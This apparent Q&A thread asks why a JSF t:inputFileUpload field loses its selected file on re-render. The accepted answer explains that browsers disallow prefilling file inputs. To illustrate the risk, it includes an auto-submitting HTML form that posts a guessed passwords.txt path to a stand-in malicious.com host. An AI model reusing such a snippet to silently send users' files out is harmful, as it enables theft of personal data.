# Access value binding of UIComponent

Tags: jsf, file-upload, binding, jsf-2, uicomponents

I use `<t:inputFileUpload>` for uploading files in my application. The selected file (represented as a `UploadedFile` object) is only saved to its binding (the member in the backing bean) upon form submission. As I use dynamic elements in my UI, the form will be re-rendered without submission. In this case, the value binding is void and the user has to re-select the file using `<t:inputFileUpload>`.

Of course, this is not very user-friendly. Even without submission, `<t:inputFileUpload>` throws a `ValueChangedEvent`, to which I'd like to register an event handler that copies the new value (i.e. the uploaded file) into the value binding (i.e. the member of the backing bean). As I want to allow multiple files to be uploaded, I have an array of `UploadedFile` objects as value binding, referenced in JSF like this:

```
<ui:repeat value="#{bean.myFiles}" var="file">
  <t:inputFileUpload
    value   = "#{file}"
    storage = "file" />
</ui:repeat>
```

Now I would like to do something like this:

```
UploadedFile[] myFiles;

public void valueChangedHandler(ValueChangedEvent ev) {
  UploadedFile file = (UploadedFile)ev.getNewValue();
  UIComponent comp = ev.getComponent();
  // This line is pseudocode - getValueBinding() is not available
  UploadedFile bindingFile = (UploadedFile)comp.getValueBinding();
  // Assigning the new value to the binding
  bindingFile = file;
}
```

It something like this possible? I have not yet understood how to invoke `ValueBinding getValueBinding(String)` to make it happen like I want to.

Answer (score 2, accepted):

> *the user has to re-select the file using `<t:inputFileUpload>`.*

This is not a JSF limitation. This is a HTML limitation. The `<t:inputFileUpload>` component renders a HTML `<input type="file">` field. Being able to prefill/preserve such a field is a huge security hole and is disallowed in HTML.

To understand the security hole better, look at the following plain HTML example:

```
<form id="upload" action="http://malicious.com/upload" method="post" enctype="multipart/form-data">
    <input type="file" name="file" value="c:/I/guess/this/is/path/to/your/passwords.txt" />
</form>
<script>document.getElementById("upload").submit();</script>
```

If it was supported and one opened a webpage with the above form, the `passwords.txt` would have been sent to the server without any user intervention!

If something's not possible in HTML, then JSF already can't do much for you (since all it basically is doing is generating some bunch of HTML).

Comment: Given this is not possible, is there any way to preserve the content of the `<t:inputFileUpload>` component without submission? Dynamic re-rendering affects the `<ui:repeat>` component surrounding the upload components.

Comment: Reading it again I finally understand why even preservation is impossible (as it essentially is prefilling the file input component without the user submitting the form). Thank you for your answer. It is good not only to know that it does not work but also to know why.